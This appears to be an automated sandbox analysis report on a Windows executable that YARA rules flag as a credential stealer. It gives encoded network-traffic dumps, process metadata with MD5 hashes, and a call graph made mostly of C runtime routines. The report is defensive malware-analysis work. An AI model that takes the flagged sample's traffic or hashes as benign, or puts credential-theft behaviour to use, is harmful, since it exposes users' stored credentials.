                                                                                Data Ascii: 5kbJNkCbgSYqYzneLG/UQtT6c24/nr6jy4tS6uRuY0iHBnQm+erBy+eP8M85r6QOoUo7XtcWu78PQoI/hLoa2GeuVM5Nrh1CY1udNrknPPfVWm/2ftKms4/Srj+I3pe87wLMRsCfnQ5XKmGyZRYomri20jtX78b7swb2TvAiSxCrBjC+xeYVzgJjOd4sa7gTnPITukuSLkvqAqL/LGpHiBfqyT5VZo22o2+RXnUDWPPwxud205JGV6tjd78cyp/
                                                                                2024-12-27 07:15:27 UTC1369INData Raw: 48 4c 31 63 69 46 61 67 36 39 70 58 72 58 53 44 4d 4f 31 55 73 2f 6d 36 2f 6f 71 53 79 38 57 6e 36 37 55 55 78 50 49 37 6b 49 73 61 74 58 57 30 64 2b 4c 6c 37 6a 47 32 53 73 70 44 71 77 48 41 38 5a 4f 31 6a 5a 44 33 78 59 32 69 79 44 47 6c 30 42 2f 32 36 42 79 66 61 75 5a 4f 6d 76 4c 5a 54 36 52 68 2b 69 32 6e 55 4b 58 67 30 63 36 73 6e 76 58 52 6d 4c 66 37 4b 71 69 76 41 66 44 73 49 64 30 68 71 48 61 63 78 74 35 4c 73 6b 66 59 4f 65 6c 4e 6a 66 6d 6b 77 4a 4f 44 32 75 43 32 76 65 51 6c 73 4f 64 6d 35 5a 6b 4e 77 43 54 69 53 71 62 43 77 6d 32 6f 48 50 41 76 38 78 50 43 32 4c 58 2f 6f 49 6e 34 32 4b 61 72 32 42 69 2f 73 54 71 53 72 52 54 41 52 37 5a 65 74 4d 54 48 55 5a 31 6e 30 54 62 64 4d 70 48 45 6a 37 6d 32 74 50 44 7a 32 49 44 57 4b 64 2f 68 4b 74 71
                                                                                Data Ascii: HL1ciFag69pXrXSDMO1Us/m6/oqSy8Wn67UUxPI7kIsatXW0d+Ll7jG2SspDqwHA8ZO1jZD3xY2iyDGl0B/26ByfauZOmvLZT6Rh+i2nUKXg0c6snvXRmLf7KqivAfDsId0hqHacxt5LskfYOelNjfmkwJOD2uC2veQlsOdm5ZkNwCTiSqbCwm2oHPAv8xPC2LX/oIn42Kar2Bi/sTqSrRTAR7ZetMTHUZ1n0TbdMpHEj7m2tPDz2IDWKd/hKtq
                                                                                2024-12-27 07:15:27 UTC1369INData Raw: 5a 78 51 76 70 44 46 65 34 39 59 6a 78 33 34 4a 63 44 50 72 73 44 36 6b 4e 48 58 74 6f 48 74 46 36 57 79 4f 64 61 74 45 35 6c 32 34 6d 6d 35 6c 63 31 72 78 32 62 4c 52 64 6f 42 73 49 53 7a 32 36 43 74 39 4f 37 44 72 38 59 4e 6e 62 63 52 38 6f 6b 50 79 31 7a 67 63 61 50 71 32 6d 2b 73 59 59 73 62 2f 41 69 79 30 4c 44 76 6a 4a 4b 6f 68 71 43 43 77 7a 32 75 7a 52 2f 4b 6d 55 2f 4c 58 6f 67 67 67 73 66 56 4f 72 42 66 33 69 4b 72 4b 59 2f 67 30 62 2b 33 6b 4b 6a 34 71 5a 58 6b 54 4a 66 44 4a 76 37 77 4a 4a 5a 59 35 57 32 35 6c 65 35 74 7a 56 37 56 4c 62 55 42 67 74 71 78 75 34 6e 70 33 63 76 64 76 74 67 71 6d 4e 70 6c 79 72 6c 4c 68 45 62 6f 63 72 58 62 78 33 43 4d 65 74 49 35 35 31 57 37 34 4e 48 6e 69 4c 6e 30 67 71 71 79 70 79 2f 45 36 57 48 54 37 6b 32 56
                                                                                Data Ascii: ZxQvpDFe49Yjx34JcDPrsD6kNHXtoHtF6WyOdatE5l24mm5lc1rx2bLRdoBsISz26Ct9O7Dr8YNnbcR8okPy1zgcaPq2m+sYYsb/Aiy0LDvjJKohqCCwz2uzR/KmU/LXogggsfVOrBf3iKrKY/g0b+3kKj4qZXkTJfDJv7wJJZY5W25le5tzV7VLbUBgtqxu4np3cvdvtgqmNplyrlLhEbocrXbx3CMetI551W74NHniLn0gqqypy/E6WHT7k2V
                                                                                2024-12-27 07:15:27 UTC1369INData Raw: 43 52 38 43 7a 4c 65 4f 4d 44 39 53 6d 31 30 73 33 38 6e 2f 58 32 6d 62 32 73 79 7a 76 45 77 69 6a 78 6b 6a 65 33 57 6f 52 61 6d 63 58 6e 51 4a 42 49 7a 79 62 4c 41 37 50 4d 6a 38 69 58 68 72 62 65 75 5a 53 2b 4b 5a 50 48 42 73 65 78 45 35 67 6d 73 43 6d 49 37 66 35 45 73 47 53 50 48 4e 6f 65 70 76 61 4f 76 62 53 52 30 4e 66 64 6a 74 35 45 6f 2b 30 69 31 6f 38 45 70 45 47 64 51 34 62 67 39 55 6e 49 53 2f 41 6e 39 67 53 6c 30 6f 72 4e 6b 75 72 30 32 37 36 62 79 6a 71 33 37 68 72 56 73 46 62 46 52 72 6c 52 75 4e 44 4f 54 38 6c 50 39 42 2b 31 56 70 37 33 7a 73 6e 37 6a 71 76 58 71 4f 2b 39 42 5a 66 45 4e 2b 57 48 53 59 42 35 70 30 36 55 6d 4d 63 7a 69 31 53 4a 41 2f 6f 66 75 76 69 49 34 75 69 69 2f 6f 50 66 72 74 73 71 73 39 51 77 6b 72 41 6b 71 48 61 49 61
                                                                                Data Ascii: CR8CzLeOMD9Sm10s38n/X2mb2syzvEwijxkje3WoRamcXnQJBIzybLA7PMj8iXhrbeuZS+KZPHBsexE5gmsCmI7f5EsGSPHNoepvaOvbSR0Nfdjt5Eo+0i1o8EpEGdQ4bg9UnIS/An9gSl0orNkur0276byjq37hrVsFbFRrlRuNDOT8lP9B+1Vp73zsn7jqvXqO+9BZfEN+WHSYB5p06UmMczi1SJA/ofuviI4uii/oPfrtsqs9QwkrAkqHaIa


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:02:15:01
                                                                                Start date:27/12/2024
                                                                                Path:C:\Users\user\Desktop\uUtgy7BbF1.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\uUtgy7BbF1.exe"
                                                                                Imagebase:0x670000
                                                                                File size:19'414'528 bytes
                                                                                MD5 hash:425BE48F2D7CC72615C4CDFDA5341832
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:1
                                                                                Start time:02:15:01
                                                                                Start date:27/12/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff70f010000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:02:15:02
                                                                                Start date:27/12/2024
                                                                                Path:C:\Users\user\Desktop\uUtgy7BbF1.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\uUtgy7BbF1.exe"
                                                                                Imagebase:0x670000
                                                                                File size:19'414'528 bytes
                                                                                MD5 hash:425BE48F2D7CC72615C4CDFDA5341832
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1481155531.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1480945277.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1480812391.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:10%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:1.2%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:32
                                                                                  execution_graph 23232 67cf43 23233 67cf5e 23232->23233 23235 67cf70 23233->23235 23236 67c9a4 23233->23236 23239 6893de 23236->23239 23240 6893ea ___scrt_is_nonwritable_in_current_image 23239->23240 23241 689408 23240->23241 23242 6893f1 23240->23242 23252 681d4e EnterCriticalSection 23241->23252 23243 686bb1 __dosmaperr 14 API calls 23242->23243 23245 6893f6 23243->23245 23247 68729c __strnicoll 29 API calls 23245->23247 23246 689417 23253 68945c 23246->23253 23249 67c9b6 23247->23249 23249->23235 23250 689425 23267 689454 23250->23267 23252->23246 23254 6894fc _Ungetc 23253->23254 23255 689472 23253->23255 23254->23250 23255->23254 23256 6894a0 23255->23256 23257 69512f _Ungetc 14 API calls 23255->23257 23256->23254 23258 68e509 _Ungetc 29 API calls 23256->23258 23257->23256 23259 6894b2 23258->23259 23260 68e509 _Ungetc 29 API calls 23259->23260 23266 6894d5 23259->23266 23261 6894be 23260->23261 23263 68e509 _Ungetc 29 API calls 23261->23263 23261->23266 23264 6894ca 23263->23264 23265 68e509 _Ungetc 29 API calls 23264->23265 23265->23266 23266->23254 23270 689512 23266->23270 23297 681d62 LeaveCriticalSection 23267->23297 23269 68945a 23269->23249 23271 68e509 _Ungetc 29 API calls 23270->23271 23272 689535 23271->23272 23273 68e509 _Ungetc 29 API calls 23272->23273 23280 68955e 23272->23280 23274 689543 23273->23274 23276 68e509 _Ungetc 29 API calls 23274->23276 23274->23280 23277 689551 23276->23277 23279 68e509 _Ungetc 29 API calls 23277->23279 23278 689598 23281 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 23278->23281 23279->23280 23280->23278 23283 68e1fb 23280->23283 23282 689616 23281->23282 23282->23254 23284 68e20e _Fputc 23283->23284 23287 68e235 23284->23287 23286 68e223 _Fputc 23286->23278 23288 68e24a 23287->23288 23290 6821e0 _Fputc 39 API calls 23288->23290 23291 68e28b 23288->23291 23294 68e277 std::invalid_argument::invalid_argument 23288->23294 23295 68e24e std::invalid_argument::invalid_argument _Fputc 23288->23295 23289 687445 _Fputc 29 API calls 23289->23295 23290->23291 23292 68ae71 _Fputc WideCharToMultiByte 23291->23292 23291->23294 23291->23295 23293 68e346 23292->23293 23293->23295 23296 68e35c GetLastError 23293->23296 23294->23289 23294->23295 23295->23286 23296->23294 23296->23295 23297->23269 23346 67d349 23347 67d358 23346->23347 23349 67d37c 23347->23349 23350 688a2d 23347->23350 23351 688a40 _Fputc 23350->23351 23354 688a9a 23351->23354 23353 688a55 _Fputc 23353->23349 23355 688aac 23354->23355 23356 688acf 23354->23356 23357 687445 _Fputc 29 API calls 23355->23357 23356->23355 23359 688af6 23356->23359 23358 688ac7 23357->23358 23358->23353 23362 688bd0 23359->23362 23363 688bdc ___scrt_is_nonwritable_in_current_image 23362->23363 23370 681d4e EnterCriticalSection 23363->23370 23365 688bea 23371 688b30 23365->23371 23367 688bf7 23380 688c1f 23367->23380 23370->23365 23372 687a7b ___scrt_uninitialize_crt 64 API calls 23371->23372 23373 688b4b 23372->23373 23374 68d662 14 API calls 23373->23374 23375 688b55 23374->23375 23376 68c0e0 __dosmaperr 14 API calls 23375->23376 23379 688b70 23375->23379 23377 688b94 23376->23377 23378 68ad27 ___free_lconv_mon 14 API calls 23377->23378 23378->23379 23379->23367 23383 681d62 LeaveCriticalSection 23380->23383 23382 688b2e 23382->23353 23383->23382 21667 68b258 21668 68b263 21667->21668 21669 68b273 21667->21669 21673 68b35d 21668->21673 21672 68ad27 ___free_lconv_mon 14 API calls 21672->21669 21674 68b378 21673->21674 21675 68b372 21673->21675 21677 68ad27 ___free_lconv_mon 14 API calls 21674->21677 21676 68ad27 ___free_lconv_mon 14 API calls 21675->21676 21676->21674 21678 68b384 21677->21678 21679 68ad27 ___free_lconv_mon 14 API calls 21678->21679 21680 68b38f 21679->21680 21681 68ad27 ___free_lconv_mon 14 API calls 21680->21681 21682 68b39a 21681->21682 21683 68ad27 ___free_lconv_mon 14 API calls 21682->21683 21684 68b3a5 21683->21684 21685 68ad27 ___free_lconv_mon 14 API calls 21684->21685 21686 68b3b0 21685->21686 21687 68ad27 ___free_lconv_mon 14 API calls 21686->21687 21688 68b3bb 21687->21688 21689 68ad27 ___free_lconv_mon 14 API calls 21688->21689 21690 68b3c6 21689->21690 21691 68ad27 ___free_lconv_mon 14 API calls 21690->21691 21692 68b3d1 21691->21692 21693 68ad27 ___free_lconv_mon 14 API calls 21692->21693 21694 68b3df 21693->21694 21699 68b4d6 21694->21699 21700 68b4e2 ___scrt_is_nonwritable_in_current_image 21699->21700 21715 687594 EnterCriticalSection 21700->21715 21703 68b4ec 21705 68ad27 ___free_lconv_mon 14 API calls 21703->21705 21706 68b516 21703->21706 21705->21706 21716 68b535 21706->21716 21707 68b541 21708 68b54d ___scrt_is_nonwritable_in_current_image 21707->21708 21720 687594 EnterCriticalSection 21708->21720 21710 68b557 21711 68b279 __dosmaperr 14 API calls 21710->21711 21712 68b56a 21711->21712 21721 68b58a 21712->21721 21715->21703 21719 6875ab LeaveCriticalSection 21716->21719 21718 68b405 21718->21707 21719->21718 21720->21710 21724 6875ab LeaveCriticalSection 21721->21724 21723 68b26b 21723->21672 21724->21723 21924 67d02a 21925 67d036 __EH_prolog3_GS 21924->21925 21927 67d0a2 21925->21927 21928 67d088 21925->21928 21933 67d050 21925->21933 21926 67e76e std::_Throw_Cpp_error 5 API calls 21929 67d179 21926->21929 21943 687d1d 21927->21943 21940 67c960 21928->21940 21932 67d0c1 21936 67d15e 21932->21936 21937 687d1d 45 API calls 21932->21937 21939 67d198 21932->21939 21963 67c4e3 21932->21963 21933->21926 21935 672c50 std::_Throw_Cpp_error 29 API calls 21935->21933 21936->21935 21937->21932 21939->21936 21967 689277 21939->21967 21980 687ed8 21940->21980 21944 687d29 ___scrt_is_nonwritable_in_current_image 21943->21944 21945 687d4b 21944->21945 21946 687d33 21944->21946 22277 681d4e EnterCriticalSection 21945->22277 21947 686bb1 __dosmaperr 14 API calls 21946->21947 21949 687d38 21947->21949 21951 68729c __strnicoll 29 API calls 21949->21951 21950 687d56 21952 68e509 _Ungetc 29 API calls 21950->21952 21955 687d6e 21950->21955 21962 687d43 21951->21962 21952->21955 21953 687dfe 22278 687e36 21953->22278 21954 687dd6 21956 686bb1 __dosmaperr 14 API calls 21954->21956 21955->21953 21955->21954 21958 687ddb 21956->21958 21961 68729c __strnicoll 29 API calls 21958->21961 21959 687e04 22288 687e2e 21959->22288 21961->21962 21962->21932 21964 67c517 21963->21964 21966 67c4f3 21963->21966 22292 67d85c 21964->22292 21966->21932 21968 689283 ___scrt_is_nonwritable_in_current_image 21967->21968 21969 68928a 21968->21969 21970 68929f 21968->21970 21971 686bb1 __dosmaperr 14 API calls 21969->21971 22330 681d4e EnterCriticalSection 21970->22330 21973 68928f 21971->21973 21975 68729c __strnicoll 29 API calls 21973->21975 21974 6892a9 22331 6892ea 21974->22331 21977 68929a 21975->21977 21977->21939 21981 687ee4 ___scrt_is_nonwritable_in_current_image 21980->21981 21982 687eeb 21981->21982 21983 687f02 21981->21983 21984 686bb1 __dosmaperr 14 API calls 21982->21984 21993 681d4e EnterCriticalSection 21983->21993 21986 687ef0 21984->21986 21988 68729c __strnicoll 29 API calls 21986->21988 21987 687f0e 21994 687f4f 21987->21994 21990 67c96b 21988->21990 21990->21933 21993->21987 21995 687f6c 21994->21995 21996 687fd2 21994->21996 21997 68e509 _Ungetc 29 API calls 21995->21997 21998 688099 21996->21998 22000 68e509 _Ungetc 29 API calls 21996->22000 21999 687f72 21997->21999 22030 687f19 21998->22030 22054 6937ef 21998->22054 22003 68e509 _Ungetc 29 API calls 21999->22003 22019 687f95 21999->22019 22001 687fe7 22000->22001 22006 68e509 _Ungetc 29 API calls 22001->22006 22022 68800a 22001->22022 22005 687f7e 22003->22005 22004 688021 22008 687e72 43 API calls 22004->22008 22009 68e509 _Ungetc 29 API calls 22005->22009 22005->22019 22010 687ff3 22006->22010 22007 687fb0 22007->22030 22034 687e72 22007->22034 22012 68802a 22008->22012 22013 687f8a 22009->22013 22014 68e509 _Ungetc 29 API calls 22010->22014 22010->22022 22012->22030 22045 681eb5 22012->22045 22016 68e509 _Ungetc 29 API calls 22013->22016 22017 687fff 22014->22017 22016->22019 22020 68e509 _Ungetc 29 API calls 22017->22020 22019->21996 22019->22007 22020->22022 22021 68806c 22050 68e39f 22021->22050 22022->21998 22022->22004 22023 687e72 43 API calls 22026 688053 22023->22026 22025 688080 22028 686bb1 __dosmaperr 14 API calls 22025->22028 22025->22030 22026->22021 22027 688059 22026->22027 22029 689277 31 API calls 22027->22029 22028->22030 22029->22030 22031 687f47 22030->22031 22276 681d62 LeaveCriticalSection 22031->22276 22033 687f4d 22033->21990 22035 687e36 22034->22035 22036 687e42 22035->22036 22037 687e57 22035->22037 22039 686bb1 __dosmaperr 14 API calls 22036->22039 22038 687e66 22037->22038 22075 6937e4 22037->22075 22038->22007 22040 687e47 22039->22040 22042 68729c __strnicoll 29 API calls 22040->22042 22044 687e52 22042->22044 22044->22007 22046 68afb3 __Getctype 39 API calls 22045->22046 22047 681ec0 22046->22047 22048 68b596 __Getctype 39 API calls 22047->22048 22049 681ed0 22048->22049 22049->22021 22049->22023 22051 68e3b2 _Fputc 22050->22051 22243 68e3d6 22051->22243 22053 68e3c4 _Fputc 22053->22025 22055 693989 22054->22055 22056 693998 22055->22056 22060 6939ad 22055->22060 22057 686bb1 __dosmaperr 14 API calls 22056->22057 22058 69399d 22057->22058 22059 68729c __strnicoll 29 API calls 22058->22059 22069 6939a8 22059->22069 22061 693a0b 22060->22061 22062 69512f _Ungetc 14 API calls 22060->22062 22060->22069 22063 68e509 _Ungetc 29 API calls 22061->22063 22062->22061 22064 693a3b 22063->22064 22065 698983 43 API calls 22064->22065 22066 693a43 22065->22066 22067 68e509 _Ungetc 29 API calls 22066->22067 22066->22069 22068 693a7d 22067->22068 22068->22069 22070 68e509 _Ungetc 29 API calls 22068->22070 22069->22030 22071 693a8b 22070->22071 22071->22069 22072 68e509 _Ungetc 29 API calls 22071->22072 22073 693a99 22072->22073 22074 68e509 _Ungetc 29 API calls 22073->22074 22074->22069 22076 6937fa 22075->22076 22077 693807 22076->22077 22080 69381f 22076->22080 22078 686bb1 __dosmaperr 14 API calls 22077->22078 22079 69380c 22078->22079 22081 68729c __strnicoll 29 API calls 22079->22081 22082 69387e 22080->22082 22090 687e63 22080->22090 22096 69512f 22080->22096 22081->22090 22084 68e509 _Ungetc 29 API calls 22082->22084 22085 693897 22084->22085 22101 698983 22085->22101 22088 68e509 _Ungetc 29 API calls 22089 6938d0 22088->22089 22089->22090 22091 68e509 _Ungetc 29 API calls 22089->22091 22090->22007 22092 6938de 22091->22092 22092->22090 22093 68e509 _Ungetc 29 API calls 22092->22093 22094 6938ec 22093->22094 22095 68e509 _Ungetc 29 API calls 22094->22095 22095->22090 22097 68c0e0 __dosmaperr 14 API calls 22096->22097 22098 69514c 22097->22098 22099 68ad27 ___free_lconv_mon 14 API calls 22098->22099 22100 695156 22099->22100 22100->22082 22102 69898f ___scrt_is_nonwritable_in_current_image 22101->22102 22103 698997 22102->22103 22107 6989b2 22102->22107 22104 686bc4 __dosmaperr 14 API calls 22103->22104 22105 69899c 22104->22105 22108 686bb1 __dosmaperr 14 API calls 22105->22108 22106 6989c9 22109 686bc4 __dosmaperr 14 API calls 22106->22109 22107->22106 22110 698a04 22107->22110 22111 69389f 22108->22111 22112 6989ce 22109->22112 22113 698a0d 22110->22113 22114 698a22 22110->22114 22111->22088 22111->22090 22116 686bb1 __dosmaperr 14 API calls 22112->22116 22117 686bc4 __dosmaperr 14 API calls 22113->22117 22131 692626 EnterCriticalSection 22114->22131 22119 6989d6 22116->22119 22120 698a12 22117->22120 22118 698a28 22121 698a5c 22118->22121 22122 698a47 22118->22122 22125 68729c __strnicoll 29 API calls 22119->22125 22123 686bb1 __dosmaperr 14 API calls 22120->22123 22132 698a9c 22121->22132 22124 686bb1 __dosmaperr 14 API calls 22122->22124 22123->22119 22127 698a4c 22124->22127 22125->22111 22129 686bc4 __dosmaperr 14 API calls 22127->22129 22128 698a57 22195 698a94 22128->22195 22129->22128 22131->22118 22133 698aae 22132->22133 22134 698ac6 22132->22134 22135 686bc4 __dosmaperr 14 API calls 22133->22135 22136 698e08 22134->22136 22141 698b09 22134->22141 22137 698ab3 22135->22137 22138 686bc4 __dosmaperr 14 API calls 22136->22138 22139 686bb1 __dosmaperr 14 API calls 22137->22139 22140 698e0d 22138->22140 22144 698abb 22139->22144 22142 686bb1 __dosmaperr 14 API calls 22140->22142 22143 698b14 22141->22143 22141->22144 22149 698b44 22141->22149 22145 698b21 22142->22145 22146 686bc4 __dosmaperr 14 API calls 22143->22146 22144->22128 22150 68729c __strnicoll 29 API calls 22145->22150 22147 698b19 22146->22147 22148 686bb1 __dosmaperr 14 API calls 22147->22148 22148->22145 22151 698b5d 22149->22151 22152 698b98 22149->22152 22153 698b6a 22149->22153 22150->22144 22151->22153 22157 698b86 22151->22157 22155 68ad61 __strnicoll 15 API calls 22152->22155 22154 686bc4 __dosmaperr 14 API calls 22153->22154 22156 698b6f 22154->22156 22158 698ba9 22155->22158 22159 686bb1 __dosmaperr 14 API calls 22156->22159 22202 695dc4 22157->22202 22161 68ad27 ___free_lconv_mon 14 API calls 22158->22161 22162 698b76 22159->22162 22165 698bb2 22161->22165 22166 68729c __strnicoll 29 API calls 22162->22166 22163 698ce4 22164 698d58 22163->22164 22167 698cfd GetConsoleMode 22163->22167 22169 698d5c ReadFile 22164->22169 22168 68ad27 ___free_lconv_mon 14 API calls 22165->22168 22194 698b81 22166->22194 22167->22164 22170 698d0e 22167->22170 22171 698bb9 22168->22171 22172 698dd0 GetLastError 22169->22172 22173 698d74 22169->22173 22170->22169 22175 698d14 ReadConsoleW 22170->22175 22176 698bde 22171->22176 22177 698bc3 22171->22177 22178 698ddd 22172->22178 22179 698d34 22172->22179 22173->22172 22174 698d4d 22173->22174 22189 698d99 22174->22189 22190 698db0 22174->22190 22174->22194 22175->22174 22182 698d2e GetLastError 22175->22182 22198 691720 22176->22198 22184 686bb1 __dosmaperr 14 API calls 22177->22184 22180 686bb1 __dosmaperr 14 API calls 22178->22180 22186 686bd7 __dosmaperr 14 API calls 22179->22186 22179->22194 22185 698de2 22180->22185 22182->22179 22183 68ad27 ___free_lconv_mon 14 API calls 22183->22144 22187 698bc8 22184->22187 22188 686bc4 __dosmaperr 14 API calls 22185->22188 22186->22194 22191 686bc4 __dosmaperr 14 API calls 22187->22191 22188->22194 22211 698ea5 22189->22211 22190->22194 22224 699149 22190->22224 22191->22194 22194->22183 22242 692649 LeaveCriticalSection 22195->22242 22197 698a9a 22197->22111 22199 691734 _Fputc 22198->22199 22230 6918c1 22199->22230 22201 691749 _Fputc 22201->22157 22203 695dde 22202->22203 22204 695dd1 22202->22204 22207 695dea 22203->22207 22208 686bb1 __dosmaperr 14 API calls 22203->22208 22205 686bb1 __dosmaperr 14 API calls 22204->22205 22206 695dd6 22205->22206 22206->22163 22207->22163 22209 695e0b 22208->22209 22210 68729c __strnicoll 29 API calls 22209->22210 22210->22206 22236 698ffc 22211->22236 22214 68adaf __strnicoll MultiByteToWideChar 22215 698fb9 22214->22215 22218 698fc2 GetLastError 22215->22218 22222 698eed 22215->22222 22216 698f47 22220 698f01 22216->22220 22223 691720 31 API calls 22216->22223 22217 698f37 22219 686bb1 __dosmaperr 14 API calls 22217->22219 22221 686bd7 __dosmaperr 14 API calls 22218->22221 22219->22222 22220->22214 22221->22222 22222->22194 22223->22220 22225 699183 22224->22225 22226 699219 ReadFile 22225->22226 22227 699214 22225->22227 22226->22227 22228 699236 22226->22228 22227->22194 22228->22227 22229 691720 31 API calls 22228->22229 22229->22227 22231 6923dd _Fputc 29 API calls 22230->22231 22232 6918d3 22231->22232 22233 6918db _Fputc 22232->22233 22234 6918ef SetFilePointerEx 22232->22234 22233->22201 22234->22233 22235 691907 GetLastError 22234->22235 22235->22233 22237 699030 22236->22237 22238 698ebc 22237->22238 22239 6990a1 ReadFile 22237->22239 22238->22216 22238->22217 22238->22220 22238->22222 22239->22238 22240 6990ba 22239->22240 22240->22238 22241 691720 31 API calls 22240->22241 22241->22238 22242->22197 22244 68e3ea 22243->22244 22252 68e3fa 22243->22252 22245 68e41f 22244->22245 22244->22252 22255 6821e0 22244->22255 22247 68e430 22245->22247 22248 68e453 22245->22248 22261 697902 22247->22261 22250 68e47b 22248->22250 22251 68e4cf 22248->22251 22248->22252 22250->22252 22254 68adaf __strnicoll MultiByteToWideChar 22250->22254 22253 68adaf __strnicoll MultiByteToWideChar 22251->22253 22252->22053 22253->22252 22254->22252 22256 6821f0 22255->22256 22264 68b5f0 22256->22264 22272 699e83 22261->22272 22265 68220d 22264->22265 22266 68b607 22264->22266 22268 68b621 22265->22268 22266->22265 22267 68f695 __Getctype 39 API calls 22266->22267 22267->22265 22269 68b638 22268->22269 22271 68221a 22268->22271 22270 68c912 __strnicoll 39 API calls 22269->22270 22269->22271 22270->22271 22271->22245 22275 699eb1 _Fputc 22272->22275 22273 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22274 69791d 22273->22274 22274->22252 22275->22273 22276->22033 22277->21950 22279 687e42 22278->22279 22280 687e57 22278->22280 22282 686bb1 __dosmaperr 14 API calls 22279->22282 22281 687e66 22280->22281 22284 6937e4 43 API calls 22280->22284 22281->21959 22283 687e47 22282->22283 22285 68729c __strnicoll 29 API calls 22283->22285 22286 687e63 22284->22286 22287 687e52 22285->22287 22286->21959 22287->21959 22291 681d62 LeaveCriticalSection 22288->22291 22290 687e34 22290->21962 22291->22290 22293 67d910 22292->22293 22294 67d880 22292->22294 22296 673240 std::_Throw_Cpp_error 30 API calls 22293->22296 22295 6732c0 std::_Throw_Cpp_error 5 API calls 22294->22295 22297 67d892 22295->22297 22298 67d915 22296->22298 22303 6734d0 22297->22303 22300 67d8de codecvt 22300->21966 22301 67d89d codecvt 22301->22300 22302 672e20 std::_Throw_Cpp_error 29 API calls 22301->22302 22302->22300 22304 6734ef 22303->22304 22309 6734e3 22303->22309 22305 67350f 22304->22305 22306 6734fc 22304->22306 22318 6735c0 22305->22318 22310 673550 22306->22310 22309->22301 22311 673573 22310->22311 22312 67356e 22310->22312 22314 6735c0 std::_Throw_Cpp_error 3 API calls 22311->22314 22321 6735e0 22312->22321 22315 67357e 22314->22315 22316 67358b 22315->22316 22325 6872ac 22315->22325 22316->22309 22319 67b9cb std::ios_base::_Init 3 API calls 22318->22319 22320 6735d2 22319->22320 22320->22309 22322 6735f8 std::ios_base::_Init 22321->22322 22323 67f0bd std::_Throw_Cpp_error RaiseException 22322->22323 22324 67360d 22323->22324 22326 6874eb __strnicoll 29 API calls 22325->22326 22327 6872bb 22326->22327 22328 6872c9 __Getctype 11 API calls 22327->22328 22329 6872c8 22328->22329 22330->21974 22332 689302 22331->22332 22339 689372 22331->22339 22333 68e509 _Ungetc 29 API calls 22332->22333 22336 689308 22333->22336 22334 69512f _Ungetc 14 API calls 22338 6892b7 22334->22338 22335 68935a 22337 686bb1 __dosmaperr 14 API calls 22335->22337 22336->22335 22336->22339 22340 68935f 22337->22340 22342 6892e2 22338->22342 22339->22334 22339->22338 22341 68729c __strnicoll 29 API calls 22340->22341 22341->22338 22345 681d62 LeaveCriticalSection 22342->22345 22344 6892e8 22344->21977 22345->22344 22361 681e3e 22362 687a0d ___scrt_uninitialize_crt 68 API calls 22361->22362 22363 681e46 22362->22363 22371 68d5b7 22363->22371 22365 681e4b 22381 68d662 22365->22381 22368 681e75 22369 68ad27 ___free_lconv_mon 14 API calls 22368->22369 22370 681e80 22369->22370 22372 68d5c3 ___scrt_is_nonwritable_in_current_image 22371->22372 22385 687594 EnterCriticalSection 22372->22385 22374 68d63a 22390 68d659 22374->22390 22376 68d5ce 22376->22374 22378 68d60e DeleteCriticalSection 22376->22378 22386 687865 22376->22386 22379 68ad27 ___free_lconv_mon 14 API calls 22378->22379 22379->22376 22382 68d679 22381->22382 22383 681e5a DeleteCriticalSection 22381->22383 22382->22383 22384 68ad27 ___free_lconv_mon 14 API calls 22382->22384 22383->22365 22383->22368 22384->22383 22385->22376 22387 687878 _Fputc 22386->22387 22393 687923 22387->22393 22389 687884 _Fputc 22389->22376 22465 6875ab LeaveCriticalSection 22390->22465 22392 68d646 22392->22365 22394 68792f ___scrt_is_nonwritable_in_current_image 22393->22394 22395 687939 22394->22395 22397 68795c 22394->22397 22396 687445 _Fputc 29 API calls 22395->22396 22403 687954 22396->22403 22397->22403 22404 681d4e EnterCriticalSection 22397->22404 22399 68797a 22405 687895 22399->22405 22401 687987 22419 6879b2 22401->22419 22403->22389 22404->22399 22406 6878a2 22405->22406 22407 6878c5 22405->22407 22408 687445 _Fputc 29 API calls 22406->22408 22409 6878bd 22407->22409 22410 687a7b ___scrt_uninitialize_crt 64 API calls 22407->22410 22408->22409 22409->22401 22411 6878dd 22410->22411 22412 68d662 14 API calls 22411->22412 22413 6878e5 22412->22413 22414 68e509 _Ungetc 29 API calls 22413->22414 22415 6878f1 22414->22415 22422 692a87 22415->22422 22418 68ad27 ___free_lconv_mon 14 API calls 22418->22409 22464 681d62 LeaveCriticalSection 22419->22464 22421 6879b8 22421->22403 22423 692ab0 22422->22423 22424 